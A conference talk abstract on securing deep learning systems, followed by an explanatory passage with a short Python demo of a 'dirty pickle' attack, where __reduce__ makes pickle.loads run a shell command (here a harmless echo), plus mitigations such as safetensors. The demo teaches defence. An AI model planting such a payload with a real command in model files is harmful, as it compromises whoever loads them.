The Old, the New, and the Strange: Securing Deep Learning in 2024
Brazos E
Patrick Smyth | Staff Developer Relations Engineer, Chainguard
Wed 01:50PM - 02:30PM, September 11th
Data poisoning. Input manipulation. Model inversion. As companies race to incorporate deep learning into production applications, we've been introduced to exciting new threats, among them exotic prompt jailbreaks and even the feared dirty pickle attack. But how much of this is truly new under the sun, and how much have we seen before? What can we learn from prior cycles of threat and mitigation in the software industry, and how does it apply to this new ML landscape? In this talk, we'll approach new threats in deep learning by comparing the deployment of ML models to the deployment of conventional software artifacts. We'll tour some of the stranger attack vectors for AI applications to determine which conventional mitigations still work in the world of models and which threat vectors are truly new, requiring new approaches. We'll also demo Chainguard's approach to deep learning infrastructure and model security, with particular attention to AI image bloat and upstream attacks. And, yes, we'll give you some tips on dealing with the dreaded dirty pickle.
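For readers unfamiliar with the "dirty pickle" family of attacks: Python's pickle format can embed code that runs at deserialization time, so merely loading an untrusted model file can compromise the loader. The sketch below is a minimal, self-contained illustration in plain Python, not taken from the talk itself; the class name and echo payload are hypothetical, for demonstration only.

import os
import pickle

class MaliciousModel:
    # __reduce__ tells pickle how to rebuild this object. Here it tells
    # the *loader* to call os.system with an attacker-chosen command.
    def __reduce__(self):
        return (os.system, ("echo 'arbitrary code ran at load time'",))

payload = pickle.dumps(MaliciousModel())

# The victim only has to load the "model" file; no further call is needed.
pickle.loads(payload)  # runs the shell command during deserialization

Conventional mitigations carry over here: treat model files as untrusted input, prefer non-executable weight formats such as safetensors, and pass weights_only=True to torch.load when loading PyTorch checkpoints.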